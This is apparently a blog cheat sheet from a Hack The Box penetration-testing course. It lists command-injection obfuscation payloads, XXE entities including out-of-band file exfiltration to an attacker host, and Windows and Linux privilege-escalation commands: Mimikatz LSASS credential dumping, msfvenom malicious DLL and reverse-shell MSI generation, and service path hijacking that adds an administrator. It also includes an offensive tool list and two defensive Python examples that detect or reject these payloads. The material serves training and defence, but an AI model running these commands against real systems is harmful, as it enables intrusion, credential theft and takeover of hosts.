Pipe                 |                     %7c
AND                  &&                    %26%26
OR                   ||                    %7c%7c
Sub-Shell            $()                   %24%28%29
Tab                  (tab character)       %09

🐧 Linux

${IFS}              # Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. $())
{ls,-la}            # Commas will be replaced with spaces
${PATH:0:1}         # Will be replaced with /
${LS_COLORS:10:1}   # Will be replaced with ;
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")    # Execute command regardless of case
$(a="WhOaMi";printf %s "${a,,}")    # Another variation of the technique
echo 'whoami' | rev                 # Reverse a string
$(rev<<<'imaohw')                   # Execute reversed command
echo -n 'cat /etc/passwd | grep 33' | base64    # Encode a string with base64
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)  # Execute base64-encoded string

🪟 Windows

Get-ChildItem Env:      # Can be used to view all environment variables - (PowerShell)
%09                     # Using tabs instead of spaces
%PROGRAMFILES:~10,-5%   # Will be replaced with a space - (CMD)
$env:PROGRAMFILES[10]   # Will be replaced with a space - (PowerShell)
%HOMEPATH:~0,-17%       # Will be replaced with \ - (CMD)
$env:HOMEPATH[0]        # Will be replaced with \ - (PowerShell)
iex "$('imaohw'[-1..-20] -join '')"     # Execute reversed command
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))   # Encode a string with base64
iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"  # Execute base64-encoded string
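The operator table and the Linux/Windows obfuscation lists above are exactly the tokens a defender wants to spot in request parameters. The Python below is an added example, not from the cheat sheet: it URL-decodes each query parameter, matches it against the operator characters and the obfuscation patterns listed above, and runs that over a few constructed web-server access-log lines (combined log format, a made-up `ip` parameter and documentation-range addresses are assumptions for the demo).

```python
# Added example, not from the HTB cheat sheet: a detector for the command
# injection operators and obfuscation tricks listed above, run over constructed
# access-log lines. Log format, parameter name and addresses are assumptions.
import re
from urllib.parse import unquote

# Operator table above: raw character -> label
OPERATORS = {
    ";": "semicolon",
    "\n": "newline",
    "&": "background/AND",
    "|": "pipe/OR",
    "$(": "sub-shell",
    "`": "backtick sub-shell",
    "\t": "tab",
}

# Obfuscation shapes from the Linux and Windows lists above
OBFUSCATION = [
    (r"\$\{IFS\}", "IFS space substitution"),
    (r"\{[^}\s]*,[^}\s]*\}", "brace-expansion spacing"),
    (r"\$\{[A-Za-z_]+:\d+:\d+\}", "variable slicing (${VAR:off:len})"),
    (r"\$\{[A-Za-z_]+,,\}", "lowercase expansion"),
    (r"\brev\b", "reversed command"),
    (r"base64\s+-d", "base64-decoded command"),
    (r"%[A-Za-z]+:~-?\d+,-?\d+%", "CMD variable substring"),
    (r"\$env:[A-Za-z]+\[-?\d+\]", "PowerShell env indexing"),
    (r"FromBase64String", "PowerShell base64 decode"),
    (r"-join\s*''", "PowerShell reversed string"),
]


def analyse_value(raw_value):
    """Decode one query-parameter value and return the labels of everything suspicious in it."""
    decoded = unquote(unquote(raw_value))   # tolerate double URL encoding
    findings = [label for token, label in OPERATORS.items() if token in decoded]
    findings += [label for pattern, label in OBFUSCATION if re.search(pattern, decoded)]
    return findings


def scan_access_log(lines):
    """Return (parameter, decoded value, findings) for every parameter that trips the detector."""
    hits = []
    for line in lines:
        m = re.search(r'"(?:GET|POST) ([^ "]+)', line)
        if not m:
            continue
        query = m.group(1).partition("?")[2]
        for pair in query.split("&"):           # raw '&' separates params; an injected one is %26
            name, _, raw_value = pair.partition("=")
            findings = analyse_value(raw_value)
            if findings:
                hits.append((name, unquote(unquote(raw_value)), findings))
    return hits


# Constructed sample log lines; the first is benign, the rest carry payload shapes from above
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Oct/2025:10:00:01 +0000] "GET /index.php?ip=127.0.0.1 HTTP/1.1" 200 512',
    '192.0.2.10 - - [03/Oct/2025:10:00:07 +0000] "GET /index.php?ip=127.0.0.1%3bwhoami HTTP/1.1" 200 640',
    '192.0.2.10 - - [03/Oct/2025:10:00:12 +0000] "GET /index.php?ip=127.0.0.1%0a%7bls,-la%7d HTTP/1.1" 200 2048',
    '192.0.2.10 - - [03/Oct/2025:10:00:20 +0000] "GET /index.php?ip=127.0.0.1%7c%24%7bIFS%7dwhoami HTTP/1.1" 200 640',
    '192.0.2.10 - - [03/Oct/2025:10:00:31 +0000] "GET /index.php?ip=127.0.0.1%26%26bash%3c%3c%3c%24(base64%20-d%3c%3c%3cY2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw%3d%3d) HTTP/1.1" 200 900',
]


if __name__ == "__main__":
    for name, value, findings in scan_access_log(SAMPLE_LOG):
        print(f"{name}={value!r}: {', '.join(findings)}")
```

Decoding before matching is the point of the exercise: the table's URL-encoded column is what appears in the log, and the obfuscated forms never contain a literal space or a plain command name, so a detector that only greps for `;whoami` misses all but the first hit. A real deployment would also drop the request at the application layer by never passing the parameter to a shell at all (an argument list to a process API, or an allow-list of what an IP field may contain).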

📁 XXE

<!ENTITY xxe SYSTEM "http://localhost/email.dtd">   # Define External Entity to a URL
<!ENTITY xxe SYSTEM "file:///etc/passwd">           # Define External Entity to a file path
<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">    # Read PHP source code with base64 encode filter
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">   # Reading a file through a PHP error
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://<OUR_IP>:8000/?content=%file;'>">   # Reading a file OOB exfiltration
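All five XXE entity declarations above live inside a DTD, so an application that does not need DTDs can refuse the whole class before any parser sees the document. The Python below is an added example, not from the cheat sheet: it rejects inbound XML carrying `<!DOCTYPE` or `<!ENTITY` and only then parses with the standard library. The sample documents are constructed from the entity shapes listed above; the 203.0.113.5 address and `corp.example` are placeholders.

```python
# Added example, not from the HTB cheat sheet: refuse any inbound XML that
# carries a DTD before it reaches a parser. Sample documents are constructed.
import re
import xml.etree.ElementTree as ET

# An external entity can only be declared inside a DOCTYPE / ENTITY declaration
DTD_MARKER = re.compile(r"<!\s*(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)

BENIGN_DOC = """<?xml version="1.0"?>
<root><name>Jane Doe</name><email>jane@corp.example</email></root>"""

# Classic file read, built from the "file:///etc/passwd" entity shape above
XXE_DOC = """<?xml version="1.0"?>
<!DOCTYPE email [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><name>&xxe;</name><email>jane@corp.example</email></root>"""

# Out-of-band exfiltration, built from the parameter-entity shape above
XXE_PARAM_DOC = """<?xml version="1.0"?>
<!DOCTYPE email [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % oob "<!ENTITY content SYSTEM 'http://203.0.113.5:8000/?content=%file;'>">
  %oob;
]>
<root><name>&content;</name><email>jane@corp.example</email></root>"""


def has_dtd(document: str) -> bool:
    """True when the document declares a DOCTYPE or an entity anywhere."""
    return DTD_MARKER.search(document) is not None


def parse_untrusted_xml(document: str) -> ET.Element:
    """Reject DTD-carrying input, then parse; ValueError means the document was refused."""
    if has_dtd(document):
        raise ValueError("rejected: document declares a DTD or entity")
    return ET.fromstring(document)


def extract_email(document: str):
    """Return the <email> text, or None when the document was rejected."""
    try:
        root = parse_untrusted_xml(document)
    except ValueError:
        return None
    return root.findtext("email")


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_DOC), ("xxe", XXE_DOC), ("xxe-oob", XXE_PARAM_DOC)):
        print(f"{label:<8} has_dtd={has_dtd(doc)!s:<5} email={extract_email(doc)}")
```

The check is parser-independent, which matters because the behaviour that makes the payloads above work (resolving external entities, expanding parameter entities) varies by library and version. Run it on the decoded text, not on raw bytes, so a UTF-16 encoded document cannot slip a `<!DOCTYPE` past a byte-level pattern.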

🐧 Linux Privilege escalation

ps aux | grep root      # See processes running as root
ps au                   # See logged-in users
sudo -l                 # Can the user run anything as another user?
ls -la /etc/cron.daily  # Check for daily cron jobs
find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null   # Find world-writable directories
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null   # Find world-writable files
./pspy64 -pf -i 1000    # View running processes with pspy
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null   # Find binaries with the SUID bit set
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null   # Find binaries with both the SUID and SGID bits set
PATH=.:${PATH}          # Add a . to the beginning of the current user's PATH
ldd /bin/ls             # View the shared objects required by a binary
sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart  # Escalate privileges using LD_PRELOAD
./lynis                 # Perform a system audit with Lynis

🪟 Windows Privilege escalation

set                             # Display all environment variables
systeminfo                      # View detailed system configuration information
wmic qfe                        # Get patches and updates
wmic product get name           # Get installed programs
tasklist /svc                   # Display running processes
query user                      # Get logged-in users
whoami /priv                    # View current user privileges
whoami /groups                  # View current user group information
net user                        # Get all system users
net localgroup                  # Get all system groups
net localgroup administrators   # View details about a group
net accounts                    # Get password policy
netstat -ano                    # Display active network connections
procdump.exe -accepteula -ma lsass.exe lsass.dmp    # Take a memory dump with ProcDump
sekurlsa::minidump lsass.dmp                        # Mimikatz: load the LSASS memory dump
sekurlsa::logonpasswords                            # Mimikatz: extract credentials from the loaded dump
dir /q C:\backups\wwwroot\web.config                # Checking ownership of a file
takeown /f C:\backups\wwwroot\web.config            # Taking ownership of a file
icacls "C:\backups\wwwroot\web.config" /grant <username>:F   # Modifying a file ACL
wevtutil qe Security /rd:true /f:text | Select-String "/user"   # Searching security event logs
wevtutil qe Security /rd:true /f:text /r:<RemoteHost> /u:<username> /p:<password> | findstr "/user"   # Passing credentials to wevtutil
msfvenom -p windows/x64/exec cmd='net group "domain admins" <username> /add /domain' -f dll -o fake.dll   # Generate a malicious DLL
wmic useraccount where name="<username>" get sid   # Finding a user's SID
sc stop <service>               # Stopping a service
sc start <service>              # Starting a service
sc config AppReadiness binPath= "cmd /c net localgroup Administrators <username> /add"   # Modifying a service binary path
rundll32 shell32.dll,Control_RunDLL C:\Users\<snip>\fake.dll   # Executing a custom DLL with rundll32.exe
.\SharpUp.exe audit             # Running SharpUp
icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"   # Checking service binary permissions with icacls
cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"   # Replace a service binary
gc (Get-PSReadLineOption).HistorySavePath   # Reading the PowerShell history file
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer   # Query for the AlwaysInstallElevated registry key (1)
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer   # Query for the AlwaysInstallElevated registry key (2)
msfvenom -p windows/shell_reverse_tcp lhost=<OUR_IP> lport=<PORT> -f msi > fake.msi   # Generate a malicious MSI package
msiexec /i c:\users\<snip>\fake.msi /quiet /qn /norestart   # Executing an MSI package from the command line



🧰 Tools & References

Below is a categorized list of the tools I used throughout the Hack The Box Penetration Tester Job Role Path, organized by purpose.
Each tool includes a short description and an official or GitHub link for quick reference.


🌐 Reconnaissance & Enumeration

| Tool | Purpose | Link |
| --- | --- | --- |
| Nmap | Network scanning, service enumeration, OS detection | nmap.org |
| dnsenum | DNS enumeration and discovery | github.com/fwaeytens/dnsenum |
| subfinder | Subdomain discovery using passive sources | github.com/projectdiscovery/subfinder |
| smtp-user-enum | SMTP user enumeration | pentestmonkey.net |
| o365spray.py | Microsoft 365 password spraying and enumeration | github.com/0xZDH/o365spray |
| crackmapexec | SMB/WinRM/LDAP enumeration and attacks | github.com/Porchetta-Industries/CrackMapExec |
| smbmap | Enumerate SMB shares and permissions | github.com/ShawnDEvans/smbmap |
| Enum4linux | SMB and Windows enumeration | github.com/portcullislabs/enum4linux |
| Username Anarchy | Username generation for brute-forcing and enumeration | github.com/urbanadventurer/username-anarchy |
| theHarvester | OSINT email and domain reconnaissance | github.com/laramies/theHarvester |
| SecLists | Wordlists for discovery, fuzzing and password cracking | github.com/danielmiessler/SecLists |
| ReconSpider | Web reconnaissance and crawling framework that automates discovery of URLs, endpoints and parameters | github.com/bhavsec/reconspider |

💻 Web Application Testing

| Tool | Purpose | Link |
| --- | --- | --- |
| Gobuster | Directory and file brute-forcing for web discovery | github.com/OJ/gobuster |
| Nikto | Web vulnerability scanning | cirt.net/Nikto2 |
| Burp Suite | Web proxy and vulnerability scanner | portswigger.net/burp |
| OWASP ZAP | Web app security scanner | owasp.org/www-project-zap |
| sqlmap | Automated SQL injection testing | sqlmap.org |
| XSStrike | Cross-site scripting scanner | github.com/s0md3v/XSStrike |

🔐 Password Attacks & Credential Tools

| Tool | Purpose | Link |
| --- | --- | --- |
| Hydra | Fast login brute-forcing | github.com/vanhauser-thc/thc-hydra |
| Medusa | Parallel brute-force tool | github.com/jmk-foofus/medusa |
| Crowbar | Brute-force tool for SSH, VNC, RDP, etc. | github.com/galkan/crowbar |
| John the Ripper | Password cracking | github.com/openwall/john |
| Hashcat | GPU-based password cracking | hashcat.net/hashcat |
| PCredz | Extract passwords from network traffic | github.com/lgandx/PCredz |
| Mimikatz | Extract credentials from LSASS memory | github.com/ParrotSec/mimikatz |
| Pypykatz | Parse LSASS dumps (Python mimikatz) | github.com/skelsec/pypykatz |
| LaZagne | Recover locally stored passwords | github.com/AlessandroZ/LaZagne |
| joomla-bruteforce | Brute-force module specifically targeting Joomla CMS logins | github.com/ajnik/joomla-bruteforce |

🧰 Exploitation & Post-Exploitation

| Tool | Purpose | Link |
| --- | --- | --- |
| Impacket | Collection of Python tools for network protocols | github.com/fortra/impacket |
| Kerbrute | Kerberos brute-forcing and user enumeration | github.com/ropnop/kerbrute |
| Rubeus.exe | Kerberos ticket operations and attacks | github.com/GhostPack/Rubeus |
| Procdump.exe | Dump process memory (e.g., LSASS) | learn.microsoft.com |
| Inveigh.ps1 | Network spoofing and credential capture | github.com/Kevin-Robertson/Inveigh |
| Certipy | Enumeration and abuse of Active Directory Certificate Services (AD CS) | github.com/ly4k/Certipy |
| DarkArmour | Tool for offensive defense / hardening techniques (e.g. memory dumping / stealth) | github.com/bats3c/darkarmour |
| Bashfuscator | Obfuscate Bash scripts to bypass detection / simplify payload hiding | github.com/Bashfuscator/Bashfuscator |
| Invoke-DOSfuscation | PowerShell script obfuscator / code hiding for red teaming | github.com/danielbohannon/Invoke-DOSfuscation |
| Sherlock | Identify potential user accounts across platforms / services (OSINT / enumeration) | github.com/rasta-mouse/Sherlock |
| Webshell (fuzzdb cmd.jsp) | Example JSP webshell payload for web exploitation, fuzzing and testing | raw.githubusercontent.com/tennc/webshell/…/cmd.jsp |

🧱 Privilege Escalation & Local Enumeration

| Tool | Purpose | Link |
| --- | --- | --- |
| LinPEAS | Linux privilege escalation checks | github.com/carlospolop/PEASS-ng |
| WinPEAS | Windows privilege escalation checks | github.com/carlospolop/PEASS-ng |
| pspy64 | Monitor processes without root permissions | github.com/DominicBreuker/pspy |
| SharpUp.exe | C# privilege escalation audit | github.com/GhostPack/SharpUp |
| Lynis | Linux security auditing | cisofy.com/lynis |

🧭 Active Directory & Lateral Movement

| Tool | Purpose | Link |
| --- | --- | --- |
| BloodHound | AD attack path visualization | github.com/SpecterOps/BloodHound |
| PowerView.ps1 | PowerShell AD enumeration | PowerSploit |
| PowerUpSQL.ps1 | SQL Server exploitation and privilege escalation | github.com/NetSPI/PowerUpSQL |

🧩 Pivoting, Tunneling & C2

| Tool | Purpose | Link |
| --- | --- | --- |
| Chisel | TCP tunneling and port forwarding | github.com/jpillora/chisel |
| rpivot | Reverse port forwarding tunnel | github.com/klsecservices/rpivot |
| ptunnel-ng | TCP tunneling over ICMP | github.com/utoni/ptunnel-ng |
| dnscat2-powershell | DNS-based C2 communication | github.com/lukebaggett/dnscat2-powershell |
| Ligolo-ng | Reverse tunneling / pivoting via a TUN interface (no SOCKS) | github.com/nicocha30/ligolo-ng |
| revshells.com | Collection of reverse shell one-liners / payloads | revshells.com |

📚 Resources

| Tool / Resource | Purpose | Link |
| --- | --- | --- |
| GTFOBins | Catalog of Unix binaries that can be abused for privilege escalation / bypasses | gtfobins.github.io |
| LOLBAS | Catalog of living-off-the-land binaries / scripts on Windows that can be abused | lolbas-project.github.io |

Last updated: 2025-09-30


💡 Always verify tool legality and scope before usage. Prefer lab or authorized testing environments.

If you notice a missing tool or an outdated link, feel free to open an issue on the blog’s repo or contact me.


This post is licensed under CC BY 4.0 by the author.